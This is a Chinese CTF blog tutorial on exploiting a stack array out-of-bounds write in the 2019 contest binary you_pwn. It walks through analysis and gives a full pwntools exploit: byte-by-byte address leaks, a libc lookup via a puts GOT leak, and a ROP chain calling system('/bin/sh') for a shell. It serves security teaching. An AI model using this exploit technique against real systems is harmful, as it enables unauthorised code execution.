PWN入门之数组越界

最新推荐文章于 2024-10-28 21:59:16 发布
最新推荐文章于 2024-10-28 21:59:16 发布
阅读量2.7k 收藏 12
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44681716/article/details/89784921
版权
该实验利用数组越界特性,填充不能用栈溢出覆盖的值。介绍了数组越界原理,包括堆和栈中的情况,重点是栈中越界。通过2019年信息安全国赛的you_pwn文件,经检测、静态分析、动态调试,泄露出ret地址、put函数在got表地址、libc地址,构造payload最终实现getshell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

实验目的

利用数组越界的特性,去填充不能利用栈溢出的方法去覆盖的值。
通过这次实验,使我们掌握利用数组越界去继续泄露的方法。

实验文件

链接:https://pan.baidu.com/s/1tLyKYjdLXjLKjRHoivhYnQ
提取码:m6ra
我们主要通过2019年4月信息安全国赛的you_pwn来介绍一下怎么去利用数组越界。

实验步骤

首先介绍一下数组越界的原理:
数组越界分两种:一个是堆中的数组越界,一个是栈中的数组越界。
1、堆中的数组越界:
因为堆是我们自己分配的,如果越界,那么会把堆中其他空间的数据给写掉,或读取了其他空间的数据,这样就会导致其他变量的数据变得不对,如果是一个指针的话,那么有可能会引起crash,这里我们主要谈论栈中的数组越界问题。
2、栈中的数组越界:
因为栈是向下增长的,在进入一个函数之前,会先把参数和下一步要执行的指令地址(通过call实现)压栈,在函数的入口会把ebp压栈,并把esp赋值给ebp,在函数返回的时候,将ebp值赋给esp,pop先前栈内的上级函数栈的基地址给ebp,恢复原栈基址,然后把调用函数之前的压入栈的指令地址pop出来(通过ret实现)。
栈是由高往低增长的,而数组的存储是由低位往高位存的,如果越界的话,会把当前函数的ebp和下一跳的指令地址覆盖掉,如果覆盖了当前函数的ebp,那么在恢复的时候esp就不能指向正确的地方,从而导致未可知的情况,如果下一跳的地址也被覆盖掉,那么肯定会导致crash。
在这里插入图片描述

这样一下看就很明显了,当你把数组的下标越过了最大索引值的时候,所指向的指针就会指向更高地址的栈空间段,所以我们就能够实现任意改写栈空间上的内容,同理,当下标为负数的时候指针会指向更低地址的栈空间段。但是这里就有一个需要注意的地方了,利用负数改写的话我们还能达到“负数变正数”的效果。

下面我们主要通过you_pwn来介绍一下怎么利用数组越界。
首先对you_pwn进行检测,看看有没有保护机制。
在这里插入图片描述
发现堆栈是canary found ,所以我们不可以进行栈溢出。
所以我们得找其他的方法进行泄露。
RELRO存在 Partial RELRO,说明got表不可写。

对文件进行静态分析:
在这里插入图片描述
我们通过输入v1,去选择我们想看栈中的位置。
通过输入v2,去篡改栈上的值。
再进行动态调试:
先运行一下you_pwn
在这里插入图片描述
在进行输入的时候,特别要注意每次只能写一个字节,即8bit。

所以,我们可以通过输入v1、v2去泄露出ret的地址,得到栈的基址。
在这里插入图片描述
从这里可以看出ret地址距离v[4]是(0x150+0x8)
在这里插入图片描述

def one(a,offset):
    aa=0x0
    
    for i in range(8):
        p.recvuntil('input index\n')
        p.sendline(str(offset))
        p.recvuntil('now value(hex) ')
        b=int(p.recvuntil('\n',drop=True)[-2:],16)
        aa|=b<<(8*i)
        new_value=(a>>(8*i))&0xff
        p.sendline(str(new_value))
        offset+=1
       aa&=0xffffffffffffffff
    print hex(aa)
    return aa

因为ret地址是8位,我们一次只能泄露一个字节,所以我们循环8次。而将每一个字节拼在一起构成8位的ret地址的时候,我们通常用采用左移或者右移的方法。通过这样的方法泄露出ret的地址。

code_base=(one(0x12345678,offset))&0xfffffffffffff000

然后再与fffffffffffff000相与,得到栈的基址。因为栈的基址最后3位都是为0。
泄露出的地址:
在这里插入图片描述
然后在泄露出put函数在got表上的地址

print('puts',hex(elf.plt['puts']+code_base))

在这里插入图片描述
然后再泄露出libc的地址,然后构造system("/bin/sh")的payload。

puts_libc=u64(p.recv(6).ljust(8,'\x00'))
libc=LibcSearcher('puts',puts_libc)
libc_base=puts_libc-libc.dump('puts')
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')
print('system=',hex(system))
print('bin_sh',hex(bin_sh))

在这里插入图片描述
最后进行getshell。
在这里插入图片描述
最后附上exp.py

from pwn import *
from LibcSearcher import *
context.log_level='debug'
context.terminal = ['gnome-terminal','-x','sh','-c']
p=process('./pwn')
elf=ELF('./pwn')
p.recvuntil('name:')
name='tt'
p.sendline(name)
offset=0x150+0x8
fun_entry=0x0000000000000B35
def one(a,offset):
    aa=0x0
    for i in range(8):
        p.recvuntil('input index\n')
        p.sendline(str(offset))
        p.recvuntil('now value(hex) ')
        b=int(p.recvuntil('\n',drop=True)[-2:],16)
        aa|=b<<(8*i)
        new_value=(a>>(8*i))&0xff
        p.sendline(str(new_value))
        offset+=1
    aa&=0xffffffffffffffff
    print hex(aa)
    return aa
code_base=(one(0x12345678,offset))&0xfffffffffffff000
pop_rdi=code_base+0x0000000000000d03
print('puts',hex(elf.plt['puts']+code_base))
one(pop_rdi,0x158)
one(elf.got['puts']+code_base,0x160)
#pwnlib.gdb.attach(p)
one(elf.plt['puts']+code_base,0x168)
one(fun_entry+code_base,0x170)
p.recvuntil('input index\n')
p.sendline(str(-100))
p.recvuntil('now value(hex) ')
p.sendline(str(0))
p.recvuntil('(yes/no)? \n')
p.sendline('yes')
puts_libc=u64(p.recv(6).ljust(8,'\x00'))
libc=LibcSearcher('puts',puts_libc)
libc_base=puts_libc-libc.dump('puts')
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')
print('system=',hex(system))
print('bin_sh',hex(bin_sh))
one(pop_rdi,0x158)
one(bin_sh,0x160)
one(system,0x168)
one(0,-0x100)
one(0,-0x100)
p.recvuntil('input index\n')
p.sendline(str(-100))
p.recvuntil('now value(hex) ')
p.sendline(str(0))
#p.recvuntil('(yes/no)? \n')
p.recv()
p.sendline('yes')
p.interactive()
'''
0x0000000000000cfc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000000cfe : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000000d00 : pop r14 ; pop r15 ; ret
0x0000000000000d02 : pop r15 ; ret
0x0000000000000cfb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000000cff : pop rbp ; pop r14 ; pop r15 ; ret
0x000000000000099b : pop rbp ; ret
0x00000000
'''
Han&Joe
关注
❤️超详细PWN新手入门教程❤️《二进制各种漏洞原理实战分析总结》
Test网络安全
09-15 1万+
本部分将对常见的二进制漏洞做系统分析,方便在漏洞挖掘过程中定位识别是什么类型漏洞,工欲善其事,必先利其器。 0x01栈溢出漏洞原理 栈溢出漏洞属于缓冲区漏洞的一种,实例如下: #include <stdio.h> #include <string.h> int main() { char *str = "AAAAAAAAAAAAAAAAAAAAAAAA"; vulnfun(str); return; } int vulnfun(char *st
VM pwn入门
weixin_44145820的博客
06-07 2252
VM pwn貌似是最近火起来的一类PWN题。最近打的好几场比赛都出现了VM pwn的题目,正好在BUU上面遇到一道2019年的OGeek中出现的VM pwn题,感觉应该会比较简单,另外听说高校战役里的EasyVM也是偏简单的VM pwn题。本文就主要对这两道题目进行分析。 [OGeek2019 Final]OVM 程序分析 作为VM pwn的第一步就是需要搞清楚指令的格式,操作码和操作数 本题使用的是定长指令,一共32bits,每一个占8bits,但除了操作码能利用完8bits之外,寄存器只占4bits,
PWN入门数组越界-附件资源
03-02
PWN入门数组越界-附件资源
ctf-pwn: 数组越界
weixin_59166557的博客
10-28 415
数组越界漏洞是一种常见的编程错误,通常发生在程序试图访问数组边界之外的内存位置时。这种漏洞可能会导致未定义的行为,包括程序崩溃、数据损坏,甚至被攻击利用来执行任意代码。数组越界漏洞在安全领域尤其受到关注,因为它们可能被用来进行“pwn”(即通过漏洞获得对系统的控制)。
CISCN2021pwn pwny(数组越界,劫持exit_hook)
m0_51251108的博客
10-03 1306
CISCN2021pwn pwny(数组越界,劫持exit_hook)
[BUUCTF]PWN——wustctf2020_name_your_cat(数组越界
mcmuyanga的博客
03-13 1491
wustctf2020_name_your_cat 附件 步骤 例行检查,32位程序,开启了canary和nx 本地试运行一下看看大概的情况 32位ida载入,在检索字符串的时候发现了后门 主要函数
pwn入门
FSD
02-23 488
作者:Tangerine@SAINTSEC 本系列的最后一篇 感谢各位看客的支持 感谢原作者的付出 一直以来都有读者向笔者咨询教程系列问题,奈何该系列并非笔者所写[笔者仅为代发]且笔者功底薄弱,故无法解答,望见谅 如有关于该系列教程的疑问建议联系论坛的原作者ID:Tangerine 0x00 got表、plt表与延迟绑定 在之前的章节中,我们无数次提到过got表和plt表这两个结构。这两个表有什么不同?为什么调用函数要经过这两个表?ret2dl-resolve与这些内容又有什么关系呢?本节我们将通
数组越界问题、指针初入门
du_lijun的博客
10-17 1228
主要内容:数组越界问题和指针初入门例子分析 一、 数组越界问题 例子思考 int main() { int i; int arr[10]; for(i=0;i&lt;=10;i++) { arr[i] = 0; printf("%d\n",i); } return 0; } 问题:当运行上述代码时,会出现什么问题?为什么会这样?...
数组下标越界
zszcr的博客
04-05 2445
原理:因为c语言不会检测数组下标,所以如果我们给数组一个超出它大小的下标,就会照成数组越界。如果是想数组中写入数据的话,就会造成数据写入到不属于数组的地方,或者说如果读取数据的话,就会读取到别的地方的数据。因为数组地址是自低往高增长,而栈的地址是自高向下降低,所以如果我们将数组下标根据栈内的空间的分布,设置为特定的值,就可以修改或者是查看我们想要查看的地址的值。比如将返回地址设置成我们想要调用函数...
2019全国大学生信息安全竞赛pwn[数组越界任意写,doublefree,ret2dl-resolve]
九层台
04-25 1890
0x01your_pwn Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 保护全开的栈地址任意写 v4的索引是可以输入的,也会输出v4数组的内容。比较麻烦的是每次只能读写一...
【妙】bug称它为"数组越界的妙用"
最后一个bug的博客
02-02 277
1、聊一聊 首先跟大家推荐一首非常温柔的歌曲,跑步的常听。 本文主要把自己对C语言中柔性数组、零数组等等的理解分享给大家,并聊聊如何构建一种统一化的学习思想。2、正文...
数组越界溢出
weixin_30778805的博客
05-08 378
数组不要过界,不要溢出,否则可能导致其他变量莫名改变。。 定义了一个数组,其中在赋值的时候,用的是宏定义,导致不小心超出了范围, 但程序没有报错, 转载于:https://www.cnblogs.com/chulin/p/9007265.html...
C语言数组越界原理
weixin_74730270的博客
11-11 100
c语言短整型范围越界,[原创]数组越界入门
weixin_33959449的博客
05-25 783
前言:做题时候遇到的第一道数组越界pwn题,其中负数利用有一块地方刚开始一直弄不太明白,发帖求助了一下,在此感谢holing大佬的帮助。介绍:0x1. 数组越界原理:0x1. 堆中的数组越界:因为堆是我们自己分配的,如果越界,那么会把堆中其他空间的数据给写掉,或读取了其他空间的数据,这样就会导致其他变量的数据变得不对,如果是一个指针的话,那么有可能会引起crash,这里我们主要谈论栈中的数组越界...
有关数组越界的一点小科普
Owen1172920954的博客
11-03 533
 说到越界,想必可以说是程序员的一大天敌了,因为在严谨的计算机中,只要有稍微一点逻辑问题,就会引起轻则阻碍运行重则程序崩溃的大大小小的问题了,今天,博主就来讲一下在基于Windows的VS里是如何处理关于数组越界的问题。首先先看这样一段代码:   #include &lt;stdio.h&gt; int main() { int i; int arr[10]; for (i = 0...
逆向-attack之数组越界
xiaozhi
09-12 1074
逆向-attack之数组越界
谈谈数组的潜在越界行为
dizuo的专栏
06-01 3176
1. 字符串函数调用 前段时间的一个小插曲,刚刚提交了一段代码,结果一个拥有十年C/C++开发经验的牛人立刻给我发了一段消息: char cfgPath[MAX_FILE_NAME]; char m_szBaseDir[MAX_FILE_NAME]; SysStrncpy( cfgPath, m_szBaseDir, SysStrlen(m_szBaseDir) ); 这样估计有问题
C语言第十四课:操作符详解(上)——算数、移位、位、赋值操作符
weixin_59392935的博客
11-26 1925
我们在前面几篇文章中对井字棋和扫雷两个阶段性练习进行了详细的练习讲解,想必各位小伙伴们对于前面学到的知识也能较为充分的掌握了。从本文开始,我们将继续进行下一部分关于操作符的学习。
buuctf pwn入门
最新发布
04-01
### BUUCTF PWN 入门教程与解题方法 #### 一、PWN题目概述 PWN是一种CTF竞赛中的常见类别,主要涉及程序漏洞利用技术。BUUCTF平台提供了丰富的PWN练习题,适合初学者学习并掌握基本的漏洞挖掘和利用技巧[^1]。 #### 二、工具准备 在解决BUUCTF上的PWN题目之前,需要准备好必要的环境和工具: - **操作系统**: 推荐使用Ubuntu或Kali Linux作为实验环境。 - **编程语言**: Python是最常用的脚本编写语言,尤其是`pwntools`库可以极大简化payload生成和交互过程[^4]。 - **调试器**: 使用GDB进行动态分析,配合PEDA插件增强功能[^2]。 - **静态分析工具**: `checksec`用于查看目标可执行文件的安全特性设置情况。 #### 三、典型解题流程 以下是针对BUUCTF上简单PWN题目的通用解决方案框架: ##### 1. 静态分析 通过`file`命令确认目标文件类型及其架构;运用`strings`查找可能存在的敏感字符串;借助`readelf`, `objdump`等进一步了解ELF结构细节以及是否存在保护机制如NX, ASLR等[^3]。 ```bash $ file pwn1 $ strings pwn1 | grep win $ checksec pwn1 ``` ##### 2. 动态调试 启动GDB加载待测程序,在可疑位置设断点观察寄存器状态变化及内存布局状况。如果存在栈溢出,则尝试定位返回地址被覆盖的具体偏移量。 ```python from pwn import * context.log_level='debug' io = process('./pwn1') gdb.attach(io,"b *0x4011a6\nc") io.recvuntil('>') io.sendline(cyclic(1024)) io.wait() core = io.corefile stack = core.rsp offset = cyclic_find(stack) print(f"Offset is {offset}") ``` ##### 3. 构造Payload 基于前面获得的信息设计合适的载荷数据包送入服务端触发预期行为完成Flag获取操作。 ```python payload = flat({ offset: [ next(u.search(b'/bin/sh\x00')), elf.symbols['system'] ] }) p.sendlineafter('> ', payload) p.interactive() ``` 以上仅为理论模型展示,请根据实际遇到的不同类型的挑战灵活调整策略。 #### 四、注意事项 - 学习过程中注重理解原理而非机械模仿现有代码片段。 - 多加实践积累经验,逐步深入探索更复杂的攻击手法比如ROP链构造等等。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值